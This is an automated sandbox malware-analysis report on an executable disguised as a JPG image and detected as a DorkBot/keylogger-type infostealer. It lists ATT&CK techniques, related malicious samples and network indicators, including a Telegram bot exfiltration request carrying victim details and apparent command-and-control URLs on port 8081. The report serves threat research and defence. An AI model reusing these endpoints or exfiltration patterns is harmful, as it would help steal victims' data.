                Service Execution
                3
                Windows Service
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
                Windows Service
                2
                Valid Accounts
                LSA Secrets131
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                31
                Virtualization/Sandbox Evasion
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe61%ReversingLabsWin32.Worm.DorkBot
                #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe100%AviraHEUR/AGEN.1321703
                #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    158.101.44.242
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2018/11/2024%20/%2021:58:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/155.94.241.187false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/svchost.exe, 00000002.00000002.4639663388.00000000056D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabsvchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.orgsvchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botsvchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.office.com/lBsvchost.exe, 00000002.00000002.4639663388.00000000056D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.orgsvchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://chrome.google.com/webstore?hl=ensvchost.exe, 00000002.00000002.4639663388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000056D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.ecosia.org/newtab/svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://varders.kozow.com:8081svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://aborters.duckdns.org:8081svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ac.ecosia.org/autocomplete?q=svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20asvchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://anotherarmy.dns.army:8081svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qsvchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enlBsvchost.exe, 00000002.00000002.4639663388.00000000056A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.orgsvchost.exe, 00000002.00000002.4639663388.000000000554D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svchost.exe, 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4641266057.00000000065B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/155.94.241.187$svchost.exe, 00000002.00000002.4639663388.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.0000000005578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.org/xml/svchost.exe, 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.000000000554D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    149.154.167.220
                                                                                    api.telegram.orgUnited Kingdom
                                                                                    62041TELEGRAMRUfalse
                                                                                    188.114.97.3
                                                                                    reallyfreegeoip.orgEuropean Union
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    158.101.44.242
                                                                                    checkip.dyndns.comUnited States
                                                                                    31898ORACLE-BMC-31898USfalse
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1557587
                                                                                    Start date and time:2024-11-18 13:24:54 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 41s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:6
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:tutals-megerstse_469253-jpg.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 61
                                                                                    • Number of non-executed functions: 294
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • VT rate limit hit for: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                    TimeTypeDescription
                                                                                    07:25:55API Interceptor11008123x Sleep call for process: svchost.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    149.154.167.220Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                    01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        188.114.97.3QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                        • gmtagency.online/api/check
                                                                                                        View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                        • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        • paste.ee/d/YU1NN
                                                                                                        TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.lnnn.fun/u5w9/
                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • paste.ee/d/dc8Ru
                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • paste.ee/d/LOToW
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        reallyfreegeoip.orgEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.96.3
                                                                                                        checkip.dyndns.comEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 158.101.44.242
                                                                                                        api.telegram.orgEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        TELEGRAMRUEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        [Inquiry] mv Palmela - CE replacement at your port, oa Nov. 22nd.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 172.67.74.152
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                        • 104.26.8.129
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        ORACLE-BMC-31898USEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 158.101.44.242
                                                                                                        rFACTURASALBARANESPENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eEnclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Invoice Payment Copy_____________________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 149.154.167.220
                                                                                                        [Inquiry] mv Palmela - CE replacement at your port, oa Nov. 22nd.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Zam#U00f3wienie 89118 _ Metal-Constructions.pdf.com.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 149.154.167.220
                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        No context
                                                                                                        Process:C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):202336
                                                                                                        Entropy (8bit):7.977489512667526
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:/fBARO+XU/TsHehwgynxHgbu30nRw/NcFv50bXNR0:/fBoOz2el+xumcYiv54L0
